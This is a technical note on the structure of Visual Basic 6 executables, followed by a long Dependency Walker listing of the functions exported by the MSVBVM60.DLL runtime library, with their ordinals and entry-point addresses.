A Visual Basic program can be compiled in Native or P-code format. The starting code can start from either Form_Load or Sub_Main module. These properties can all be found in the VB Structure. A partial detail about this can be found in Alex Ionescu's paper (http://www.alex-ionescu.com/vb.pdf). You can also use an IDA Pro IDC script to parse the VB executable binary which can be found at http://www.hex-rays.com/products/ida/support/freefiles/vb.idc.
MSVBVM60.DLL
The Visual Basic library is responsible for interpreting the VB p-code back to its native APIs. While the libraries contain modules that communicates with system wide libraries like KERNEL32.DLL and USER32.DLL.
The exports and symbol outputs are based on this library version:
Here is a list of exported APIs that I grabbed using dependency:
***************************| Module Dependency Tree |***************************
* *
* Legend: F Forwarded Module ? Missing Module 6 64-bit Module *
* D Delay Load Module ! Invalid Module *
* * Dynamic Module E Import/Export Mismatch or Load Failure *
* ^ Duplicate Module *
* *
* O Ordinal Function E Import/Export Error F Forwarded Function *
* C C Function R Called At Least Once * Dynamic Function *
* + C++ Function *
* *
********************************************************************************
[ ] MSVBVM60.DLL
Import Ordinal Hint Function Entry Point
------ ------------- ------------ ---------------------------------- -----------
Export Ordinal Hint Function Entry Point
------ ------------- ------------ ---------------------------------- -----------
[C ] 100 (0x0064) 60 (0x003C) ThunRTMain 0x000035A4
[C ] 101 (0x0065) 73 (0x0049) VBDllUnRegisterServer 0x00093CBF
[C ] 102 (0x0066) 70 (0x0046) VBDllCanUnloadNow 0x00093A6B
[C ] 103 (0x0067) 72 (0x0048) VBDllRegisterServer 0x00093C37
[C ] 104 (0x0068) 71 (0x0047) VBDllGetClassObject 0x00093AE2
[C ] 105 (0x0069) 69 (0x0045) UserDllMain 0x000938F7
[C ] 106 (0x006A) 13 (0x000D) DllRegisterServer 0x000C6043
[C ] 107 (0x006B) 14 (0x000E) DllUnregisterServer 0x000C6221
[C ] 108 (0x006C) 94 (0x005E) __vbaAryLock 0x000DC6D9
[C ] 109 (0x006D) 102 (0x0066) __vbaBoolErrVar 0x000E1A88
[C ] 110 (0x006E) 296 (0x0128) __vbaRedimVar2 0x000DC3AC
[C ] 111 (0x006F) 314 (0x013A) __vbaStrErrVarCopy 0x000E1A7C
[C ] 112 (0x0070) 368 (0x0170) __vbaVarLateMemCallLd 0x00108D8C
[C ] 113 (0x0071) 369 (0x0171) __vbaVarLateMemCallLdRf 0x00108DA8
[C ] 114 (0x0072) 370 (0x0172) __vbaVarLateMemCallSt 0x00108DE2
[C ] 115 (0x0073) 371 (0x0173) __vbaVarLateMemSt 0x00108DC7
[C ] 116 (0x0074) 372 (0x0174) __vbaVarLateMemStAd 0x00108DFD
[C ] 117 (0x0075) 101 (0x0065) __vbaAryVarVarg 0x001074E4
[C ] 118 (0x0076) 162 (0x00A2) __vbaFpCDblR4 0x0010761B
[C ] 119 (0x0077) 163 (0x00A3) __vbaFpCDblR8 0x0010761B
[C ] 120 (0x0078) 164 (0x00A4) __vbaFpCSngR4 0x00107604
[C ] 121 (0x0079) 165 (0x00A5) __vbaFpCSngR8 0x00107604
[C ] 122 (0x007A) 166 (0x00A6) __vbaFpCmpCy 0x00107632
[C ] 123 (0x007B) 167 (0x00A7) __vbaFpCy 0x001075AF
[C ] 124 (0x007C) 168 (0x00A8) __vbaFpI2 0x00107559
[C ] 125 (0x007D) 169 (0x00A9) __vbaFpI4 0x00107570
[C ] 126 (0x007E) 170 (0x00AA) __vbaFpR4 0x00107587
[C ] 127 (0x007F) 171 (0x00AB) __vbaFpR8 0x0010759B
[C ] 128 (0x0080) 172 (0x00AC) __vbaFpUI1 0x00107534
[C ] 129 (0x0081) 173 (0x00AD) __vbaFreeObj 0x000D9FAF
[C ] 130 (0x0082) 175 (0x00AF) __vbaFreeStr 0x000E6BEC
[C ] 131 (0x0083) 177 (0x00B1) __vbaFreeVar 0x00106831
[C ] 132 (0x0084) 179 (0x00B3) __vbaFreeVarg 0x00106A0A
[C ] 133 (0x0085) 193 (0x00C1) __vbaI2Abs 0x000E4CDA
[C ] 134 (0x0086) 197 (0x00C5) __vbaI2I4 0x000E1A08
[C ] 135 (0x0087) 198 (0x00C6) __vbaI2Sgn 0x000E4D2C
[C ] 136 (0x0088) 201 (0x00C9) __vbaI4Abs 0x000E4D03
[C ] 137 (0x0089) 205 (0x00CD) __vbaI4Sgn 0x000E4D44
[C ] 138 (0x008A) 311 (0x0137) __vbaStrCopy 0x000E6C4A
[C ] 139 (0x008B) 319 (0x013F) __vbaStrMove 0x000E6C30
[C ] 140 (0x008C) 332 (0x014C) __vbaUI1I2 0x000E19DC
[C ] 141 (0x008D) 333 (0x014D) __vbaUI1I4 0x000E19F2
[C ] 142 (0x008E) 334 (0x014E) __vbaUI1Sgn 0x000E4D19
[C ] 143 (0x008F) 351 (0x015F) __vbaVarCopy 0x00106BB8
[C ] 144 (0x0090) 354 (0x0162) __vbaVarDup 0x00106DF6
[C ] 145 (0x0091) 376 (0x0178) __vbaVarMove 0x00106AEE
[C ] 146 (0x0092) 409 (0x0199) __vbaVarVargNofree 0x0010728D
[C ] 147 (0x0093) 411 (0x019B) __vbaVarZero 0x00106EA2
[C ] 148 (0x0094) 414 (0x019E) __vbaVargParmRef 0x001072B1
[C ] 149 (0x0095) 417 (0x01A1) __vbaVargVar 0x001072BE
[C ] 150 (0x0096) 418 (0x01A2) __vbaVargVarCopy 0x00107340
[C ] 151 (0x0097) 419 (0x01A3) __vbaVargVarMove 0x00107330
[C ] 152 (0x0098) 420 (0x01A4) __vbaVargVarRef 0x00107301
[C ] 153 (0x0099) 9 (0x0009) DLLGetDocumentation 0x000C632E
[C ] 154 (0x009A) 10 (0x000A) DllCanUnloadNow 0x0009FCB2
[C ] 155 (0x009B) 12 (0x000C) DllGetClassObject 0x0009FC2D
[C ] 156 (0x009C) 82 (0x0052) _CIatan 0x000F92C0
[C ] 157 (0x009D) 83 (0x0053) _CIcos 0x000F9386
[C ] 158 (0x009E) 84 (0x0054) _CIexp 0x000EDD11
[C ] 159 (0x009F) 85 (0x0055) _CIlog 0x000F942B
[C ] 160 (0x00A0) 86 (0x0056) _CIsin 0x000F94EE
[C ] 161 (0x00A1) 87 (0x0057) _CIsqrt 0x000F9593
[C ] 162 (0x00A2) 88 (0x0058) _CItan 0x000F9644
[C ] 163 (0x00A3) 89 (0x0059) __vbaAptOffset 0x000D686A
[C ] 164 (0x00A4) 91 (0x005B) __vbaAryConstruct2 0x000DC6AE
[C ] 165 (0x00A5) 90 (0x005A) __vbaAryConstruct 0x000DC694
[C ] 166 (0x00A6) 92 (0x005C) __vbaAryCopy 0x000CC20D
[C ] 167 (0x00A7) 93 (0x005D) __vbaAryDestruct 0x000DC1FE
[C ] 168 (0x00A8) 95 (0x005F) __vbaAryMove 0x000CC244
[C ] 169 (0x00A9) 96 (0x0060) __vbaAryRebase1Var 0x000DC083
[C ] 170 (0x00AA) 97 (0x0061) __vbaAryRecCopy 0x000CC27B
[C ] 171 (0x00AB) 98 (0x0062) __vbaAryRecMove 0x000CC2F8
[C ] 172 (0x00AC) 99 (0x0063) __vbaAryUnlock 0x000DC6FC
[C ] 173 (0x00AD) 100 (0x0064) __vbaAryVar 0x00103940
[C ] 174 (0x00AE) 103 (0x0067) __vbaBoolStr 0x000E0FED
[C ] 175 (0x00AF) 104 (0x0068) __vbaBoolVar 0x000E0D73
[C ] 176 (0x00B0) 105 (0x0069) __vbaBoolVarNull 0x00107185
[C ] 177 (0x00B1) 106 (0x006A) __vbaCVarAryUdt 0x000DC146
[C ] 178 (0x00B2) 107 (0x006B) __vbaCastObj 0x00105DED
[C ] 179 (0x00B3) 108 (0x006C) __vbaCastObjVar 0x000DA17B
[C ] 180 (0x00B4) 109 (0x006D) __vbaCheckType 0x000D9609
[C ] 181 (0x00B5) 110 (0x006E) __vbaCheckTypeVar 0x000D9656
[C ] 182 (0x00B6) 111 (0x006F) __vbaChkstk 0x000F62EA
[C ] 183 (0x00B7) 112 (0x0070) __vbaCopyBytes 0x000DA0F3
[C ] 184 (0x00B8) 113 (0x0071) __vbaCopyBytesZero 0x000DA118
[C ] 185 (0x00B9) 114 (0x0072) __vbaCyAbs 0x000E9833
[C ] 186 (0x00BA) 46 (0x002E) ProcCallEngine 0x000FD05D
[C ] 187 (0x00BB) 11 (0x000B) DllFunctionCall 0x0000A0FD
[C ] 188 (0x00BC) 115 (0x0073) __vbaCyAdd 0x000E976A
[C ] 189 (0x00BD) 116 (0x0074) __vbaCyErrVar 0x000E4E36
[C ] 190 (0x00BE) 7 (0x0007) CopyRecord 0x000DB749
[C ] 191 (0x00BF) 117 (0x0075) __vbaCyFix 0x000E96C9
[C ] 192 (0x00C0) 118 (0x0076) __vbaCyForInit 0x00109410
[C ] 193 (0x00C1) 119 (0x0077) __vbaCyForNext 0x00109438
[C ] 194 (0x00C2) 120 (0x0078) __vbaCyI2 0x000E199F
[C ] 195 (0x00C3) 63 (0x003F) TipGetAddressOfPredeclaredInstance 0x000CEA97
[C ] 196 (0x00C4) 121 (0x0079) __vbaCyI4 0x000E19B1
[C ] 197 (0x00C5) 122 (0x007A) __vbaCyInt 0x000E96F9
[C ] 198 (0x00C6) 123 (0x007B) __vbaCyMul 0x000E9794
[C ] 199 (0x00C7) 45 (0x002D) MethCallEngine 0x00103B68
[C ] 200 (0x00C8) 124 (0x007C) __vbaCyMulI2 0x000E9674
[C ] 201 (0x00C9) 125 (0x007D) __vbaCySgn 0x000E4DC7
[C ] 202 (0x00CA) 126 (0x007E) __vbaCyStr 0x000E1189
[C ] 203 (0x00CB) 127 (0x007F) __vbaCySub 0x000E977F
[C ] 204 (0x00CC) 128 (0x0080) __vbaCyUI1 0x000E198D
[C ] 205 (0x00CD) 129 (0x0081) __vbaCyVar 0x000E4E3D
[C ] 206 (0x00CE) 130 (0x0082) __vbaDateR4 0x000E1A1E
[C ] 207 (0x00CF) 131 (0x0083) __vbaDateR8 0x000E1A50
[C ] 208 (0x00D0) 132 (0x0084) __vbaDateStr 0x000E111B
[C ] 209 (0x00D1) 133 (0x0085) __vbaDateVar 0x000E0D16
[C ] 210 (0x00D2) 134 (0x0086) __vbaDerefAry 0x000DC292
[C ] 211 (0x00D3) 135 (0x0087) __vbaDerefAry1 0x000DC254
[C ] 212 (0x00D4) 136 (0x0088) __vbaEnd 0x000CBE88
[C ] 213 (0x00D5) 137 (0x0089) __vbaErase 0x000DC0FD
[C ] 214 (0x00D6) 138 (0x008A) __vbaEraseKeepData 0x000DC117
[C ] 215 (0x00D7) 139 (0x008B) __vbaEraseNoPop 0x000DC1DA
[C ] 216 (0x00D8) 140 (0x008C) __vbaError 0x000CE84E
[C ] 217 (0x00D9) 141 (0x008D) __vbaErrorOverflow 0x000CE867
[C ] 218 (0x00DA) 142 (0x008E) __vbaExceptHandler 0x000E47DF
[C ] 219 (0x00DB) 143 (0x008F) __vbaExitEachAry 0x00106424
[C ] 220 (0x00DC) 66 (0x0042) TipSetOption 0x000CBD77
[C ] 221 (0x00DD) 144 (0x0090) __vbaExitEachColl 0x00106446
[C ] 222 (0x00DE) 145 (0x0091) __vbaExitEachVar 0x00106404
[C ] 223 (0x00DF) 146 (0x0092) __vbaExitProc 0x000E4A48
[C ] 224 (0x00E0) 147 (0x0093) __vbaFPException 0x00107513
[C ] 225 (0x00E1) 148 (0x0094) __vbaFPFix 0x000E9758
[C ] 226 (0x00E2) 149 (0x0095) __vbaFPInt 0x000E9821
[C ] 227 (0x00E3) 68 (0x0044) TipUnloadProject 0x0000CF4C
[C ] 228 (0x00E4) 150 (0x0096) __vbaFailedFriend 0x000CBE92
[C ] 229 (0x00E5) 151 (0x0097) __vbaFileClose 0x000D417D
[C ] 230 (0x00E6) 62 (0x003E) TipCreateInstanceProject2 0x000CE91E
[C ] 231 (0x00E7) 32 (0x0020) EbResetProject 0x0000CA68
[C ] 232 (0x00E8) 25 (0x0019) EbGetHandleOfExecutingProject 0x000CEB1C
[C ] 233 (0x00E9) 152 (0x0098) __vbaFileCloseAll 0x000D4191
[C ] 234 (0x00EA) 153 (0x0099) __vbaFileLock 0x000E6738
[C ] 235 (0x00EB) 154 (0x009A) __vbaFileOpen 0x000D3D10
[C ] 236 (0x00EC) 155 (0x009B) __vbaFileSeek 0x000E54CB
[C ] 237 (0x00ED) 156 (0x009C) __vbaFixstrConstruct 0x000E9618
[C ] 238 (0x00EE) 157 (0x009D) __vbaForEachAry 0x00106294
[C ] 239 (0x00EF) 158 (0x009E) __vbaForEachCollAd 0x00105FB3
[C ] 240 (0x00F0) 159 (0x009F) __vbaForEachCollObj 0x0010606C
[C ] 241 (0x00F1) 160 (0x00A0) __vbaForEachCollVar 0x00105ECE
[C ] 242 (0x00F2) 161 (0x00A1) __vbaForEachVar 0x00106315
[C ] 243 (0x00F3) 174 (0x00AE) __vbaFreeObjList 0x000D9FC3
[C ] 244 (0x00F4) 176 (0x00B0) __vbaFreeStrList 0x000E6C01
[C ] 245 (0x00F5) 178 (0x00B2) __vbaFreeVarList 0x00107262
[C ] 246 (0x00F6) 180 (0x00B4) __vbaGenerateBoundsError 0x000DC410
[C ] 247 (0x00F7) 181 (0x00B5) __vbaGet3 0x000E56DE
[C ] 248 (0x00F8) 182 (0x00B6) __vbaGet4 0x000E5715
[C ] 249 (0x00F9) 183 (0x00B7) __vbaGetFxStr3 0x000E57C2
[C ] 250 (0x00FA) 184 (0x00B8) __vbaGetFxStr4 0x000E57F6
[C ] 251 (0x00FB) 185 (0x00B9) __vbaGetOwner3 0x000E5750
[C ] 252 (0x00FC) 186 (0x00BA) __vbaGetOwner4 0x000E5787
[C ] 253 (0x00FD) 187 (0x00BB) __vbaGosub 0x00103BD6
[C ] 254 (0x00FE) 188 (0x00BC) __vbaGosubFree 0x00103C2A
[C ] 255 (0x00FF) 189 (0x00BD) __vbaGosubReturn 0x00103BFF
[C ] 256 (0x0100) 190 (0x00BE) __vbaHresultCheck 0x000DA266
[C ] 257 (0x0101) 191 (0x00BF) __vbaHresultCheckNonvirt 0x000DA2B9
[C ] 258 (0x0102) 192 (0x00C0) __vbaHresultCheckObj 0x000DA274
[C ] 259 (0x0103) 194 (0x00C2) __vbaI2Cy 0x001075E0
[C ] 260 (0x0104) 195 (0x00C3) __vbaI2ErrVar 0x000E4E1A
[C ] 261 (0x0105) 196 (0x00C4) __vbaI2ForNextCheck 0x001094B0
[C ] 262 (0x0106) 199 (0x00C7) __vbaI2Str 0x000E102D
[C ] 263 (0x0107) 200 (0x00C8) __vbaI2Var 0x000E4E21
[C ] 264 (0x0108) 202 (0x00CA) __vbaI4Cy 0x001075F2
[C ] 265 (0x0109) 33 (0x0021) EbResetProjectNormal 0x0000AD6B
[C ] 266 (0x010A) 67 (0x0043) TipUnloadInstance 0x000CBBF6
[C ] 267 (0x010B) 203 (0x00CB) __vbaI4ErrVar 0x000E4E28
[C ] 268 (0x010C) 29 (0x001D) EbLibraryLoad 0x00003259
[C ] 269 (0x010D) 30 (0x001E) EbLibraryUnload 0x000CCDCF
[C ] 270 (0x010E) 204 (0x00CC) __vbaI4ForNextCheck 0x001094D8
[C ] 271 (0x010F) 31 (0x001F) EbLoadRunTime 0x00008EE2
[C ] 272 (0x0110) 206 (0x00CE) __vbaI4Str 0x000E105E
[C ] 273 (0x0111) 207 (0x00CF) __vbaI4Var 0x000E4E2F
[C ] 274 (0x0112) 22 (0x0016) EbCreateContext 0x000067B7
[C ] 275 (0x0113) 23 (0x0017) EbDestroyContext 0x0000E505
[C ] 276 (0x0114) 34 (0x0022) EbSetContextWorkerThread 0x000067F8
[C ] 277 (0x0115) 208 (0x00D0) __vbaInStr 0x0000A296
[C ] 278 (0x0116) 209 (0x00D1) __vbaInStrB 0x000E74C2
[C ] 279 (0x0117) 210 (0x00D2) __vbaInStrVar 0x000E738D
[C ] 280 (0x0118) 211 (0x00D3) __vbaInStrVarB 0x000E7258
[C ] 281 (0x0119) 212 (0x00D4) __vbaInputFile 0x000D3C58
[C ] 282 (0x011A) 213 (0x00D5) __vbaLateIdCall 0x00108B74
[C ] 283 (0x011B) 214 (0x00D6) __vbaLateIdCallLd 0x00108B25
[C ] 284 (0x011C) 24 (0x0018) EbGetErrorInfo 0x000CC5DE
[C ] 285 (0x011D) 215 (0x00D7) __vbaLateIdCallSt 0x00108B5D
[C ] 286 (0x011E) 216 (0x00D8) __vbaLateIdNamedCall 0x00108C07
[C ] 287 (0x011F) 217 (0x00D9) __vbaLateIdNamedCallLd 0x00108BBF
[C ] 288 (0x0120) 218 (0x00DA) __vbaLateIdNamedCallSt 0x00108BE7
[C ] 289 (0x0121) 219 (0x00DB) __vbaLateIdNamedStAd 0x00108C2B
[C ] 290 (0x0122) 220 (0x00DC) __vbaLateIdSt 0x00108B44
[C ] 291 (0x0123) 221 (0x00DD) __vbaLateIdStAd 0x00108BA6
[C ] 292 (0x0124) 222 (0x00DE) __vbaLateMemCall 0x00108CB8
[C ] 293 (0x0125) 223 (0x00DF) __vbaLateMemCallLd 0x00108C4D
[C ] 294 (0x0126) 224 (0x00E0) __vbaLateMemCallSt 0x00108C98
[C ] 295 (0x0127) 225 (0x00E1) __vbaLateMemNamedCall 0x00108D46
[C ] 296 (0x0128) 226 (0x00E2) __vbaLateMemNamedCallLd 0x00108CFE
[C ] 297 (0x0129) 227 (0x00E3) __vbaLateMemNamedCallSt 0x00108D26
[C ] 298 (0x012A) 28 (0x001C) EbIsProjectOnStack 0x0000CA4B
[C ] 299 (0x012B) 61 (0x003D) TipCreateInstanceEx 0x000CBC56
[C ] 300 (0x012C) 36 (0x0024) GetMem2 0x000F5E10
[C ] 301 (0x012D) 37 (0x0025) GetMem4 0x000F5E23
[C ] 302 (0x012E) 38 (0x0026) GetMem8 0x000F5E34
[C ] 303 (0x012F) 42 (0x002A) GetMemStr 0x000F5E66
[C ] 304 (0x0130) 43 (0x002B) GetMemVar 0x000F5EA0
[C ] 305 (0x0131) 41 (0x0029) GetMemObj 0x000F5E4B
[C ] 306 (0x0132) 48 (0x0030) PutMem2 0x000F5F49
[C ] 307 (0x0133) 49 (0x0031) PutMem4 0x000F5F5A
[C ] 308 (0x0134) 50 (0x0032) PutMem8 0x000F5F69
[C ] 309 (0x0135) 54 (0x0036) PutMemStr 0x000F604F
[C ] 310 (0x0136) 55 (0x0037) PutMemVar 0x000F6096
[C ] 311 (0x0137) 53 (0x0035) PutMemObj 0x000F5F7F
[C ] 312 (0x0138) 59 (0x003B) SetMemVar 0x000F61D8
[C ] 313 (0x0139) 58 (0x003A) SetMemObj 0x000F61B1
[C ] 314 (0x013A) 40 (0x0028) GetMemNewObj 0x000F5EBF
[C ] 315 (0x013B) 52 (0x0034) PutMemNewObj 0x000F6149
[C ] 316 (0x013C) 57 (0x0039) SetMemNewObj 0x000F6266
[C ] 317 (0x013D) 35 (0x0023) GetMem1 0x000F5DFF
[C ] 318 (0x013E) 47 (0x002F) PutMem1 0x000F5F3A
[C ] 319 (0x013F) 39 (0x0027) GetMemEvent 0x000F5F1F
[C ] 320 (0x0140) 51 (0x0033) PutMemEvent 0x000F61A1
[C ] 321 (0x0141) 56 (0x0038) SetMemEvent 0x000F6276
[C ] 322 (0x0142) 228 (0x00E4) __vbaLateMemNamedStAd 0x00108D6A
[C ] 323 (0x0143) 229 (0x00E5) __vbaLateMemSt 0x00108C75
[C ] 324 (0x0144) 230 (0x00E6) __vbaLateMemStAd 0x00108CDC
[C ] 325 (0x0145) 231 (0x00E7) __vbaLbound 0x000DC628
[C ] 326 (0x0146) 232 (0x00E8) __vbaLdZeroAry 0x00103988
[C ] 327 (0x0147) 233 (0x00E9) __vbaLenBstr 0x000E6A9B
[C ] 328 (0x0148) 234 (0x00EA) __vbaLenBstrB 0x000E6C7F
[C ] 329 (0x0149) 235 (0x00EB) __vbaLenVar 0x000E6AAB
[C ] 330 (0x014A) 236 (0x00EC) __vbaLenVarB 0x000E6B1A
[C ] 331 (0x014B) 237 (0x00ED) __vbaLineInputStr 0x000D2EC9
[C ] 332 (0x014C) 238 (0x00EE) __vbaLineInputVar 0x000D2FA3
[C ] 333 (0x014D) 239 (0x00EF) __vbaLsetFixstr 0x000E76E5
[C ] 334 (0x014E) 240 (0x00F0) __vbaLsetFixstrFree 0x000E77F3
[C ] 335 (0x014F) 241 (0x00F1) __vbaMidStmtBstr 0x000E7C22
[C ] 336 (0x0150) 242 (0x00F2) __vbaMidStmtBstrB 0x000E7CF4
[C ] 337 (0x0151) 243 (0x00F3) __vbaMidStmtVar 0x000E7C4C
[C ] 338 (0x0152) 244 (0x00F4) __vbaMidStmtVarB 0x000E7C73
[C ] 339 (0x0153) 245 (0x00F5) __vbaNameFile 0x000D6402
[C ] 340 (0x0154) 247 (0x00F7) __vbaNew2 0x000DA237
[C ] 341 (0x0155) 246 (0x00F6) __vbaNew 0x000DA204
[C ] 342 (0x0156) 248 (0x00F8) __vbaNextEachAry 0x00106119
[C ] 343 (0x0157) 249 (0x00F9) __vbaNextEachCollAd 0x00106011
[C ] 344 (0x0158) 250 (0x00FA) __vbaNextEachCollObj 0x001060C4
[C ] 345 (0x0159) 251 (0x00FB) __vbaNextEachCollVar 0x00105F13
[C ] 346 (0x015A) 252 (0x00FC) __vbaNextEachVar 0x001063BC
[C ] 347 (0x015B) 253 (0x00FD) __vbaObjAddref 0x000D9F9A
[C ] 348 (0x015C) 254 (0x00FE) __vbaObjIs 0x000D96C8
[C ] 349 (0x015D) 255 (0x00FF) __vbaObjSet 0x000D9FF1
[C ] 350 (0x015E) 256 (0x0100) __vbaObjSetAddref 0x000DA008
[C ] 351 (0x015F) 257 (0x0101) __vbaObjVar 0x000DA1A9
[C ] 352 (0x0160) 258 (0x0102) __vbaOnError 0x000E499D
[C ] 353 (0x0161) 259 (0x0103) __vbaOnGoCheck 0x000CC357
[C ] 354 (0x0162) 260 (0x0104) __vbaPowerR8 0x000E11CA
[C ] 355 (0x0163) 261 (0x0105) __vbaPrintFile 0x000D50A3
[C ] 356 (0x0164) 262 (0x0106) __vbaPrintObj 0x000D5041
[C ] 357 (0x0165) 263 (0x0107) __vbaPut3 0x000E56FA
[C ] 358 (0x0166) 264 (0x0108) __vbaPut4 0x000E5733
[C ] 359 (0x0167) 265 (0x0109) __vbaPutFxStr3 0x000E57DC
[C ] 360 (0x0168) 266 (0x010A) __vbaPutFxStr4 0x000E5812
[C ] 361 (0x0169) 267 (0x010B) __vbaPutOwner3 0x000E576C
[C ] 362 (0x016A) 268 (0x010C) __vbaPutOwner4 0x000E57A5
[C ] 363 (0x016B) 269 (0x010D) __vbaR4Cy 0x000E19C2
[C ] 364 (0x016C) 270 (0x010E) __vbaR4ErrVar 0x000E4E44
[C ] 365 (0x016D) 271 (0x010F) __vbaR4ForNextCheck 0x001094FC
[C ] 366 (0x016E) 272 (0x0110) __vbaR4Sgn 0x000E4D59
[C ] 367 (0x016F) 273 (0x0111) __vbaR4Str 0x000E10BA
[C ] 368 (0x0170) 274 (0x0112) __vbaR4Var 0x000E4E52
[C ] 369 (0x0171) 275 (0x0113) __vbaR8Cy 0x000E19CF
[C ] 370 (0x0172) 276 (0x0114) __vbaR8ErrVar 0x000E4E4B
[C ] 371 (0x0173) 277 (0x0115) __vbaR8FixI2 0x000E97C5
[C ] 372 (0x0174) 278 (0x0116) __vbaR8FixI4 0x000E97DC
[C ] 373 (0x0175) 279 (0x0117) __vbaR8ForNextCheck 0x00109530
[C ] 374 (0x0176) 280 (0x0118) __vbaR8IntI2 0x000E97F3
[C ] 375 (0x0177) 281 (0x0119) __vbaR8IntI4 0x000E980A
[C ] 376 (0x0178) 282 (0x011A) __vbaR8Sgn 0x000E4D90
[C ] 377 (0x0179) 283 (0x011B) __vbaR8Str 0x000E10EA
[C ] 378 (0x017A) 284 (0x011C) __vbaR8Var 0x000E4E59
[C ] 379 (0x017B) 285 (0x011D) __vbaRaiseEvent 0x00108B8F
[C ] 380 (0x017C) 286 (0x011E) __vbaRecAnsiToUni 0x000DB797
[C ] 381 (0x017D) 287 (0x011F) __vbaRecAssign 0x000DB721
[C ] 382 (0x017E) 288 (0x0120) __vbaRecDestruct 0x000DB704
[C ] 383 (0x017F) 289 (0x0121) __vbaRecDestructAnsi 0x000DB7D1
[C ] 384 (0x0180) 290 (0x0122) __vbaRecUniToAnsi 0x000DB75D
[C ] 385 (0x0181) 291 (0x0123) __vbaRedim 0x000DC30A
[C ] 386 (0x0182) 292 (0x0124) __vbaRedimPreserve 0x000DC339
[C ] 387 (0x0183) 293 (0x0125) __vbaRedimPreserveVar 0x000DC38A
[C ] 388 (0x0184) 294 (0x0126) __vbaRedimPreserveVar2 0x000DC3DE
[C ] 389 (0x0185) 295 (0x0127) __vbaRedimVar 0x000DC368
[C ] 390 (0x0186) 297 (0x0129) __vbaRefVarAry 0x000DC417
[C ] 391 (0x0187) 298 (0x012A) __vbaResume 0x000E49E1
[C ] 392 (0x0188) 299 (0x012B) __vbaRsetFixstr 0x000E78F9
[C ] 393 (0x0189) 300 (0x012C) __vbaRsetFixstrFree 0x000E7A06
[C ] 394 (0x018A) 301 (0x012D) __vbaSetSystemError 0x000CC33A
[C ] 395 (0x018B) 302 (0x012E) __vbaStopExe 0x000CBE4A
[C ] 396 (0x018C) 303 (0x012F) __vbaStr2Vec 0x00103A40
[C ] 397 (0x018D) 304 (0x0130) __vbaStrAryToAnsi 0x000CC0E0
[C ] 398 (0x018E) 305 (0x0131) __vbaStrAryToUnicode 0x000CC0F6
[C ] 399 (0x018F) 306 (0x0132) __vbaStrBool 0x000E0493
[C ] 400 (0x0190) 20 (0x0014) EVENT_SINK_QueryInterface 0x000C9A85
[C ] 401 (0x0191) 17 (0x0011) EVENT_SINK_AddRef 0x000C9B74
[C ] 402 (0x0192) 21 (0x0015) EVENT_SINK_Release 0x000C9B87
[C ] 403 (0x0193) 18 (0x0012) EVENT_SINK_GetIDsOfNames 0x000C9BBE
[C ] 404 (0x0194) 19 (0x0013) EVENT_SINK_Invoke 0x000C9BDC
[C ] 405 (0x0195) 307 (0x0133) __vbaStrCat 0x000E6A76
[C ] 406 (0x0196) 308 (0x0134) __vbaStrCmp 0x000E9596
[C ] 407 (0x0197) 309 (0x0135) __vbaStrComp 0x000E7BE9
[C ] 408 (0x0198) 310 (0x0136) __vbaStrCompVar 0x000E7B3E
[C ] 409 (0x0199) 312 (0x0138) __vbaStrCy 0x000E0613
[C ] 410 (0x019A) 3 (0x0003) BASIC_CLASS_QueryInterface 0x00006C74
[C ] 411 (0x019B) 0 (0x0000) BASIC_CLASS_AddRef 0x00006C40
[C ] 412 (0x019C) 4 (0x0004) BASIC_CLASS_Release 0x0000EA59
[C ] 413 (0x019D) 1 (0x0001) BASIC_CLASS_GetIDsOfNames 0x000CA0B3
[C ] 414 (0x019E) 2 (0x0002) BASIC_CLASS_Invoke 0x000CA14F
[C ] 415 (0x019F) 313 (0x0139) __vbaStrDate 0x000E05D0
[C ] 416 (0x01A0) 315 (0x013B) __vbaStrFixstr 0x000E9652
[C ] 417 (0x01A1) 316 (0x013C) __vbaStrI2 0x000E0507
[C ] 418 (0x01A2) 317 (0x013D) __vbaStrI4 0x000E0537
[C ] 419 (0x01A3) 318 (0x013E) __vbaStrLike 0x000E95BA
[C ] 420 (0x01A4) 5 (0x0005) BASIC_DISPINTERFACE_GetTICount 0x000DE895
[C ] 421 (0x01A5) 6 (0x0006) BASIC_DISPINTERFACE_GetTypeInfo 0x000C97D1
[C ] 422 (0x01A6) 320 (0x0140) __vbaStrR4 0x000E0567
[C ] 423 (0x01A7) 321 (0x0141) __vbaStrR8 0x000E059B
[C ] 424 (0x01A8) 322 (0x0142) __vbaStrTextCmp 0x000E95A8
[C ] 425 (0x01A9) 323 (0x0143) __vbaStrTextLike 0x000E95CF
[C ] 426 (0x01AA) 324 (0x0144) __vbaStrToAnsi 0x0000A3D7
[C ] 427 (0x01AB) 325 (0x0145) __vbaStrToUnicode 0x000CBF1D
[C ] 428 (0x01AC) 326 (0x0146) __vbaStrUI1 0x000E04D4
[C ] 429 (0x01AD) 327 (0x0147) __vbaStrVarCopy 0x000E0646
[C ] 430 (0x01AE) 80 (0x0050) Zombie_QueryInterface 0x000CB279
[C ] 431 (0x01AF) 75 (0x004B) Zombie_AddRef 0x00006C40
[C ] 432 (0x01B0) 81 (0x0051) Zombie_Release 0x0000EA59
[C ] 433 (0x01B1) 78 (0x004E) Zombie_GetTypeInfoCount 0x000CB261
[C ] 434 (0x01B2) 77 (0x004D) Zombie_GetTypeInfo 0x000CB259
[C ] 435 (0x01B3) 76 (0x004C) Zombie_GetIDsOfNames 0x000CB269
[C ] 436 (0x01B4) 79 (0x004F) Zombie_Invoke 0x000CB271
[C ] 437 (0x01B5) 328 (0x0148) __vbaStrVarMove 0x000E1929
[C ] 438 (0x01B6) 329 (0x0149) __vbaStrVarVal 0x000E1948
[C ] 439 (0x01B7) 330 (0x014A) __vbaUI1Cy 0x001075CE
[C ] 440 (0x01B8) 15 (0x000F) EVENT_SINK2_AddRef 0x000C9B9A
[C ] 441 (0x01B9) 16 (0x0010) EVENT_SINK2_Release 0x000C9BAC
[C ] 442 (0x01BA) 331 (0x014B) __vbaUI1ErrVar 0x000E4DFD
[C ] 443 (0x01BB) 335 (0x014F) __vbaUI1Str 0x000E196D
[C ] 444 (0x01BC) 336 (0x0150) __vbaUI1Var 0x000E4E13
[C ] 445 (0x01BD) 337 (0x0151) __vbaUbound 0x000DC65A
[C ] 446 (0x01BE) 338 (0x0152) __vbaUdtVar 0x00103911
[C ] 447 (0x01BF) 339 (0x0153) __vbaUnkVar 0x000DA1DF
[C ] 448 (0x01C0) 340 (0x0154) __vbaVar2Vec 0x00103AEC
[C ] 449 (0x01C1) 341 (0x0155) __vbaVarAbs 0x00107752
[C ] 450 (0x01C2) 342 (0x0156) __vbaVarAdd 0x001077C1
